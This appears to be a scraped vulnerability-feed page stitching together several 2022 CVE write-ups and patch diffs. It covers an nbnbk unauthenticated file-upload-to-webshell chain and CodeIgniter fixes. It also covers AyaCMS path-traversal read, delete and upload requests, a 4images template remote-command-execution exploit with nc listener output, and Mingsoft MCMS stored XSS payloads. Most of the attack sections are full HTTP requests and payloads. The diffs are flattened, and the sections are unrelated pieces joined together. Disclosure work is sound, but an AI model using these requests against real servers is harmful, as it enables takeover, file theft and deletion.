Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.

**nbnbk 存在任意文件上传 Getshell**

Nbnbk has any file upload Getshell

**0x00 前言 Preface**

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

**0x01 漏洞复现 Vulnerability Reproduction****1.获取 token**

文件上传的接口需要 access\_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access\_ Token, we can get it from this interface

POST /api/login/wx\_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head\_img=1&nickname=1

可以在返回包中发现 token 已经生成  
You can find that token has been generated in the return package

    HTTP/1.1 200 OK
    Date: Wed, 02 Mar 2022 01:37:25 GMT
    Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
    X-Powered-By: PHP/7.4.21
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST
    Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
    Content-Length: 831
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
    

**2.在 vps 中启动 http 服务**

Start HTTP service in VPS

echo '<?php phpinfo();' \> index.php
python -m http.server 8099

**3.文件上传**

File Upload

POST /api/User/download\_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access\_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access\_token 就是上面获取的 token，url 是文件地址，path 是文件名  
Access\_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

**0x02 漏洞分析**

Vulnerability Analysis

**1.发现危险函数**

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。  
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download\_img 的函数，其中 url 和 path 变量是可控的。  
Double-click to find a download\_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。  
Curl is used directly here to access the url'we provided and path\` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。  
Construct the approach request directly but prompt token error, we need to get token next.

**2.获取token**

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get \`token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数  
Follow Up wxLogin Function

1.  折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2.  通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New \`token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

CVE-2022-46493: 🛡️  Nbnbk has any file upload Getshell · Issue #1 · Fanli2012/nbnbk

CodeIgniter is a PHP full-stack web framework. This vulnerability may allow attackers to spoof their IP address when the server is behind a reverse proxy. This issue has been patched, please upgrade to version 4.2.11 or later, and configure `Config\App::$proxyIPs`. As a workaround, do not use `$request->getIPAddress()`.

@@ -11,6 +11,7 @@  
namespace CodeIgniter\\HTTP;  
use CodeIgniter\\Exceptions\\ConfigException; use CodeIgniter\\Validation\\FormatRules;  
/\*\* @@ -43,7 +44,9 @@ trait RequestTrait /\*\* \* Gets the user's IP address. \* \* @return string IP address \* @return string IP address if it can be detected, or empty string. \* If the IP address is not a valid IP address, \* then will return '0.0.0.0'. \*/ public function getIPAddress(): string { @@ -59,93 +62,86 @@ public function getIPAddress(): string /\*\* \* @deprecated $this->proxyIPs property will be removed in the future \*/ // @phpstan-ignore-next-line $proxyIPs = $this\->proxyIPs ?? config('App')->proxyIPs; if (! empty($proxyIPs) && ! is\_array($proxyIPs)) { $proxyIPs = explode(',', str\_replace(' ', '', $proxyIPs)); if (! empty($proxyIPs)) { // @phpstan-ignore-next-line if (! is\_array($proxyIPs) || is\_int(array\_key\_first($proxyIPs))) { throw new ConfigException( 'You must set an array with Proxy IP address key and HTTP header name value in Config\\App::$proxyIPs.' ); } }  
$this\->ipAddress = $this\->getServer('REMOTE\_ADDR');  
if ($proxyIPs) { foreach (\['x-forwarded-for', 'client-ip', 'x-client-ip', 'x-cluster-client-ip'\] as $header) { $spoof = null; $headerObj = $this\->header($header);  
if ($headerObj !== null) { $spoof = $headerObj\->getValue();  
// Some proxies typically list the whole chain of IP // addresses through which the client has reached us. // e.g. client\_ip, proxy\_ip1, proxy\_ip2, etc. sscanf($spoof, '%\[^,\]', $spoof);  
if (! $ipValidator($spoof)) { $spoof = null; } else { break; } } }  
if ($spoof) { foreach ($proxyIPs as $proxyIP) { // Check if we have an IP address or a subnet if (strpos($proxyIP, '/') === false) { // An IP address (and not a subnet) is specified. // We can compare right away. if ($proxyIP === $this\->ipAddress) { // @TODO Extract all this IP address logic to another class. foreach ($proxyIPs as $proxyIP => $header) { // Check if we have an IP address or a subnet if (strpos($proxyIP, '/') === false) { // An IP address (and not a subnet) is specified. // We can compare right away. if ($proxyIP === $this\->ipAddress) { $spoof = $this\->getClientIP($header);  
if ($spoof !== null) { $this\->ipAddress = $spoof; break; }  
continue; }  
// We have a subnet ... now the heavy lifting begins if (! isset($separator)) { $separator = $ipValidator($this\->ipAddress, 'ipv6') ? ':' : '.'; } continue; }  
// If the proxy entry doesn't match the IP protocol - skip it if (strpos($proxyIP, $separator) === false) { continue; } // We have a subnet ... now the heavy lifting begins if (! isset($separator)) { $separator = $ipValidator($this\->ipAddress, 'ipv6') ? ':' : '.'; }  
// Convert the REMOTE\_ADDR IP address to binary, if needed if (! isset($ip, $sprintf)) { if ($separator === ':') { // Make sure we're have the "full" IPv6 format $ip = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($this\->ipAddress, ':')), $this\->ipAddress)); // If the proxy entry doesn't match the IP protocol - skip it if (strpos($proxyIP, $separator) === false) { continue; }  
for ($j = 0; $j < 8; $j++) { $ip\[$j\] = intval($ip\[$j\], 16); } // Convert the REMOTE\_ADDR IP address to binary, if needed if (! isset($ip, $sprintf)) { if ($separator === ':') { // Make sure we're having the "full" IPv6 format $ip = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($this\->ipAddress, ':')), $this\->ipAddress));  
$sprintf = '%016b%016b%016b%016b%016b%016b%016b%016b'; } else { $ip = explode('.', $this\->ipAddress); $sprintf = '%08b%08b%08b%08b'; for ($j = 0; $j < 8; $j++) { $ip\[$j\] = intval($ip\[$j\], 16); }  
$ip = vsprintf($sprintf, $ip); $sprintf = '%016b%016b%016b%016b%016b%016b%016b%016b'; } else { $ip = explode('.', $this\->ipAddress); $sprintf = '%08b%08b%08b%08b'; }  
// Split the netmask length off the network address sscanf($proxyIP, '%\[^/\]/%d', $netaddr, $masklen); $ip = vsprintf($sprintf, $ip); }  
// Again, an IPv6 address is most likely in a compressed form if ($separator === ':') { $netaddr = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($netaddr, ':')), $netaddr)); // Split the netmask length off the network address sscanf($proxyIP, '%\[^/\]/%d', $netaddr, $masklen);  
for ($i = 0; $i < 8; $i++) { $netaddr\[$i\] = intval($netaddr\[$i\], 16); } } else { $netaddr = explode('.', $netaddr); // Again, an IPv6 address is most likely in a compressed form if ($separator === ':') { $netaddr = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($netaddr, ':')), $netaddr));  
for ($i = 0; $i < 8; $i++) { $netaddr\[$i\] = intval($netaddr\[$i\], 16); } } else { $netaddr = explode('.', $netaddr); }  
// Convert to binary and finally compare if (strncmp($ip, vsprintf($sprintf, $netaddr), $masklen) === 0) { $spoof = $this\->getClientIP($header);  
// Convert to binary and finally compare if (strncmp($ip, vsprintf($sprintf, $netaddr), $masklen) === 0) { if ($spoof !== null) { $this\->ipAddress = $spoof; break; } @@ -160,6 +156,34 @@ public function getIPAddress(): string return empty($this\->ipAddress) ? '' : $this\->ipAddress; }  
/\*\* \* Gets the client IP address from the HTTP header. \*/ private function getClientIP(string $header): ?string { $ipValidator = \[ new FormatRules(), 'valid\_ip', \]; $spoof = null; $headerObj = $this\->header($header);  
if ($headerObj !== null) { $spoof = $headerObj\->getValue();  
// Some proxies typically list the whole chain of IP // addresses through which the client has reached us. // e.g. client\_ip, proxy\_ip1, proxy\_ip2, etc. sscanf($spoof, '%\[^,\]', $spoof);  
if (! $ipValidator($spoof)) { $spoof = null; } }  
return $spoof; }  
/\*\* \* Fetch an item from the $\_SERVER array. \*

CVE-2022-23556: Merge pull request from GHSA-ghw3-5qvm-3mqc · codeigniter4/CodeIgniter4@5ca8c99

CodeIgniter is a PHP full-stack web framework. When an application uses (1) multiple session cookies (e.g., one for user pages and one for admin pages) and (2) a session handler is set to `DatabaseHandler`, `MemcachedHandler`, or `RedisHandler`, then if an attacker gets one session cookie (e.g., one for user pages), they may be able to access pages that require another session cookie (e.g., for admin pages). This issue has been patched, please upgrade to version 4.2.11 or later. As a workaround, use only one session cookie.

@@ -358,8 +358,8 @@ same way: unusable during the same request after you destroy the session.  
You may also use the \`\`stop()\`\` method to completely kill the session by removing the old session\_id, destroying all data, and destroying the cookie that contained the session id: by removing the old session ID, destroying all data, and destroying the cookie that contained the session ID:  
.. literalinclude:: sessions/038.php  
@@ -390,26 +390,35 @@ all of the options and their effects. You'll find the following Session related preferences in your \*\*app/Config/App.php\*\* file:  
\============================== ============================================ ================================================= ============================================================================================ Preference Default Options Description \============================== ============================================ ================================================= ============================================================================================ \*\*sessionDriver\*\* CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler The session storage driver to use. CodeIgniter\\\\Session\\\\Handlers\\\\DatabaseHandler CodeIgniter\\\\Session\\\\Handlers\\\\MemcachedHandler CodeIgniter\\\\Session\\\\Handlers\\\\RedisHandler CodeIgniter\\\\Session\\\\Handlers\\\\ArrayHandler \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ============================================ ================================================= ============================================================================================ \============================== ================== =========================== ============================================================ Preference Default Options Description \============================== ================== =========================== ============================================================ \*\*sessionDriver\*\* FileHandler::class FileHandler::class The session storage driver to use. DatabaseHandler::class All the session drivers are located in the MemcachedHandler::class \`\`CodeIgniter\\Session\\Handlers\\\`\` namespace. RedisHandler::class ArrayHandler::class \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. The value will be included in the key of the Database/Memcached/Redis session records. So, set the value so that it does not exceed the maximum length of the key. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ================== =========================== ============================================================  
.. note:: As a last resort, the Session library will try to fetch PHP's session related INI settings, as well as legacy CI settings such as @@ -498,9 +507,9 @@ permissions will probably break your application. Instead, you should do something like this, depending on your environment ::  
mkdir /<path to your application directory>/Writable/sessions/ chmod 0700 /<path to your application directory>/Writable/sessions/ chown www-data /<path to your application directory>/Writable/sessions/ \> mkdir /<path to your application directory>/writable/sessions/ \> chmod 0700 /<path to your application directory>/writable/sessions/ \> chown www-data /<path to your application directory>/writable/sessions/  
Bonus Tip \--------- @@ -518,6 +527,8 @@ In addition, if performance is your only concern, you may want to look into using \`tmpfs <https://eddmann.com/posts/storing-php-sessions-file-caches-in-memory-using-tmpfs/\>\`\_, (warning: external resource), which can make your sessions blazing fast.  
.. \_sessions-databasehandler-driver:  
DatabaseHandler Driver \======================  
@@ -561,6 +572,10 @@ For PostgreSQL::  
CREATE INDEX "ci\_sessions\_timestamp" ON "ci\_sessions" ("timestamp");  
.. note:: The \`\`id\`\` value contains the session cookie name (\`\`Config\\App::$sessionCookieName\`\`) and the session ID and a delimiter. It should be increased as needed, for example, when using long session IDs.  
You will also need to add a PRIMARY KEY \*\*depending on your 'sessionMatchIP' setting\*\*. The examples below work both on MySQL and PostgreSQL::  
@@ -595,6 +610,8 @@ when it generates the code. done processing session data if you're having performance issues.  
.. \_sessions-redishandler-driver:  
RedisHandler Driver \===================  
@@ -631,6 +648,8 @@ sufficient:  
.. literalinclude:: sessions/041.php  
.. \_sessions-memcachedhandler-driver:  
MemcachedHandler Driver \=======================

CVE-2022-46170: Merge pull request from GHSA-6cq5-8cj7-g558 · codeigniter4/CodeIgniter4@f9fb657

AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php

Vulnerability files: /aya/module/admin/fst\_down.inc.php, /aya/module/admin/fst\_del.inc.php  
Vulnerability description: The check\_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than "./\\" such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.  
1、Arbitrary file download Vulnerability  
  
You can access any file in the system through  
admin.php?action=fst_down&file=aya/table/../../../../../../windows/win.ini  

2、Arbitrary file delete Vulnerability  
  
First I create a file named 111.txt under C:\\Windows  
  
Then the files can be deleted through  
admin.php?action=fst_del&file=aya/../../../../../windows/111.txt&in_ajax=1  
  

3、Arbitrary file upload Vulnerability  

    POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
    Host: xx.xx.xx.xx
    Content-Length: 204
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu
    Content-Disposition: form-data; name="upfile"; filename="shell.php"
    Content-Type: text/plain
    
    <?php phpinfo(); ?>
    ------WebKitFormBoundary9HCWsLRL4AuZwHyu--

CVE-2022-47926: AyaCMS v3.1.2 has  Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

AyaCMS v3.1.2 was found to have a code flaw in the ust_sql.inc.php file, which allows attackers to cause command execution by inserting malicious code.

Vulnerable path ：/aya/module/admin/ust\_sql.inc.php  
Vulnerability description: In the ust\_sql.inc.php file, the $dir parameter is composed of year, month, day\_hour, minute and second\_random four characters. When we back up the database, the system will query all the data and save the data to /backup/$dir/path , and stored in 1.php file format, but in the process of data insertion, reading and writing, the data is not strictly filtered, only the special characters in the string used in the SQL statement are escaped through the mysql\_escape\_string function, so we can Randomly add malicious php codes such as in articles, messages and other functions, and finally write the malicious codes into the 1.php backup file by backing up the database. When we visit the 1.php file again , which can cause the command to be executed.  
  

We can freely add malicious php codes in articles, messages and other functions  
  
Finally, by backing up the database, write the malicious code into the 1.php backup file  
  
  
Remember this folder name  
  
Then we go to access the 1.php file in this folder，We can find that the malicious code executes  
  
And we can write PHP Trojans to execute system commands and control servers。

CVE-2022-46101: AyaCMS v3.1.2 RCE vulnerability · Issue #6 · loadream/AyaCMS

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.2.

@@ -221,7 +221,14 @@ public function load($markup, $contentType = null, $newDocumentID = null) } if ($loaded) { // $this->document->formatOutput = true; $this\->document\->formatOutput = false; $this\->document\->preserveWhiteSpace = true;  
$this\->document\->validateOnParse\=false; $this\->document\->strictErrorChecking\=false; $this\->document\->recover\=false;  
  
$this\->xpath = new DOMXPath($this\->document); $this\->afterMarkupLoad();  
@@ -294,11 +301,21 @@ protected function documentCreate($charset, $version = '1.0') if (!$version) { $version = '1.0'; }  
libxml\_use\_internal\_errors(true);  
$this\->document = new DOMDocument($version, $charset); $this\->charset = $this\->document\->encoding; // $this->document->encoding = $charset; $this\->document\->formatOutput = true; // $this->document->formatOutput = true; $this\->document\->formatOutput = false; // $this->document->standalone = true; $this\->document\->preserveWhiteSpace = true;  
  
$this\->document\->validateOnParse\=false; $this\->document\->strictErrorChecking\=false; $this\->document\->recover\=false; }  
protected function loadMarkupHTML($markup, $requestedCharset = null) @@ -378,7 +395,15 @@ protected function loadMarkupHTML($markup, $requestedCharset = null) ? $this->document->loadHTML($markup) : @$this->document->loadHTML($markup); \*/  
$return = @$this\->document\->loadHTML($markup); // $return = @$this->document->loadHTML($markup); $return = @$this\->document\->loadHTML($markup, LIBXML\_SCHEMA\_CREATE | LIBXML\_HTML\_NOIMPLIED | LIBXML\_HTML\_NODEFDTD | LIBXML\_NOERROR | LIBXML\_NONET | LIBXML\_NOWARNING );  
if ($return) { $this\->root = $this\->document; @@ -763,6 +788,10 @@ private function documentFragmentLoadMarkup($fragment, $charset, $markup = null) .'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ' .'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">' .'<fake xmlns="http://www.w3.org/1999/xhtml">'.$markup.'</fake>');  
/\* $fragment->loadMarkupXML('<?xml version="1.0" encoding="'.$charset.'"?>'\*/ // . phpQuery::$defaultDoctype.'' // .'<fake xmlns="http://www.w3.org/1999/xhtml">'.$markup.'</fake>'); $fragment\->root = $fragment\->document\->firstChild\->nextSibling; } else { $fragment\->loadMarkupXML('<?xml version="1.0" encoding="'.$charset.'"?><fake>'.$markup.'</fake>'); @@ -5079,8 +5108,10 @@ abstract class phpQuery \* \* @var unknown\_type \*/ public static $defaultDoctype = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" public static $defaultDoctype\_old = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">';  
public static $defaultDoctype = '<!doctype html>'; public static $defaultCharset = 'UTF-8';  
/\*\*

CVE-2022-4647: update · microweber/microweber@20df566

A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip

\# Version: v1.0

\# Tested on: Windows 10

As no sanitization is performed in the \`name\` parameter, it is possible to send XSS payload which gets stored as a result which results in Stored XSS.

Mitigation:

Sanitize user input to mitigate from this attack.

CVE-2021-43657: CVE-2021-43657/Info.txt at main · c0n5n3d/CVE-2021-43657

Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where a specially crafted PHP script could use parameters from a HTTP request to create a URL capable of changing the host parameter. The changed host parameter in the HTTP could point to another host that will send a request to the host or IP specified in the changed host parameter.

CVE-2022-3189

A vulnerability has been found in Mingsoft MCMS 5.2.9 and classified as problematic. Affected by this vulnerability is the function save of the component Article Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216499.

**漏洞详情**

在保存或者更新文章的时候，没有对提交数据做严格的过滤。生成文章时，在前台照成xss攻击。

    net.mingsoft.cms.action#save()
    

    net.mingsoft.cms.action#update()
    

在net.mingsoft.cms.entity包下面都是类似JavaBean的写法，set()直接设置，get()获取返回直接返回，没有过滤。

构造payload

可以看到这几个字段都没经过有限过滤。

  
生成poc

生成时，会把上面payload直接输出到前台html。

可以看到其中 标题、描述、内容，直接输出到前台HTML。

可以看到contentTitle、contentDescription、contentDetails 三个构造的payload触发。

    POST /ms/cms/content/save.do HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Cache-Control: no-cache
    Pragma: no-cache
    token: null
    Content-Length: 491
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/ms/cms/content/form.do
    Cookie: Phpstorm-f6f062b4=5f525093-5f84-4757-8d57-73a0807e485f; currentMenuCode=1599107821860655104; pageNo=2; pageSize=20; pageno_cookie=1; SHIRO_SESSION_ID=58a8d37d-8a16-430e-a7ef-925839f673e0; rememberMe=5cjEDUiKQ6EcshxFJv6JNis4+TagGWtfYnhBYTSNM7EP5KDqO2/eXptuk3yigpRYnLtx+I12zn8n+Gst9nIatcPOzKhtmhXsRFeVEZkhMnKk6/hwmvK6bikR3zS59ckqOCyxze4jmESJ8Kh8h50p1w9CchOCxhcH17GpRz29vlPFvdT1iKZHMHncxuhfDCfBj5mQOpwSHtGotKOJoQ+EJdnmcRvkdDRkP/woZ+xvAZTixkRHW1HWn3/nIjapKo5G5EmXeuN+1YmauoeMX9NXg1n4Q3XONqwS3EJC1PMqdLWIOxBjt9vEGC9OnsiUHlZDZnFwxFs9A0gELQUO0qy0/cudGdDamjgFTa4bLCQvJ0GjHCaigPj+PvQ2qPc+dfXuUzC9sYK9E1tv8QtsrEQXjuNoHsc7a0OMvTPSfKYntICLzNfhI8oDF6dZLuW/4pRUYTD9N650hVA/Aa9oDrLMCj10m52kTPrQ0u3yU6VsOSr4vY1D/Zkj7VsHfnN8teAwC0V0CzyDC+PJfIuccESmNSkI/7mtVNV9P45dY8eJZTP+GgAEOLcZB73BYRujlD50iqaeMxUJXQPOZkpE8rCrxZpKS+1sjgti9gbRYdbdiF4b78GNyzOZShCGMIdt06uuDcL4pGIq6iBSVk2v0hf65nbIFhl7Wfn3hZeg6/ETfTqUCYq8vW0TLK6WO7njF/083lb4Pz39Bx2Dejdx5IfQt5oLyxSoqLrDaB87Fuq+96yZz3Iw+VITpahW2UBinDGF25R85PbqKY8SacCQzqQaqHz4zKkPLtIvMEVYld7bMVL+vLU5FB7Da5Ti9ce+XAkUK6nEsWYpJq3ONi5+nzI1ZSIWfEuumIK6xGQ6qpyjPSo732xSfHT+1fpAhs+yTGlFpTk+iht43qK5upi2jcAZcxqy3mFjjbLXVAng7Bp0QbRH+aD+su8H/UEGiOEJ9b6in2zCN/caz6YNmNpjb1ubG3VBOYanpERZEaRuL/5Sl294YE6mBUPfn+CN0xjzJWCiC0KqBI1DCxb6D0u2mLdsXaCbhCv02VyVL3IlHScbE50MXz/ioisb0ccLTNzafP41YjO5bDz1laIsvTw1keROjcltAexzgQxnC42tozLKzedLygLClhuxqvzHMGTnQg5J5nvmYWT96gc7uuEJnyQl4/62RY0bnQ/nj7b81nHxxZQeAUSico2GKeQjJGSTPNWMh++h8sdImqVvbE2ARhkgXsyOIQrmGTN8Tk+g2yVPG947S37PGdUCb2lfzRBV1UQipiNJ1HuSTbfSzNRY5Nfrer0xaI78+Mc5j7xoSswg1r5jsO/zFdL/66U+DO5Q8jsQTn8zjapBYK+nEa0=
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    contentTitle=<svg/onload=console.log('xss1')>&categoryId=1329257757913718785&contentType=<svg/onload=console.log('xss2')>&contentDisplay=0&contentAuthor=<svg/onload=console.log('xss3')>&contentSource=<svg/onload=console.log('xss4')>&contentSort=0&contentImg="><svg/onload%3dconsole.log('xss5')>"<&contentDescription=<svg/onload=console.log('xss6')>&contentKeyword=<svg/onload=console.log('xss7')>&contentDetails=<svg/onload=console.log('xss8')>&contentDatetime=2022-12-08%2005%3A19%3A37&id=0

Tag

#php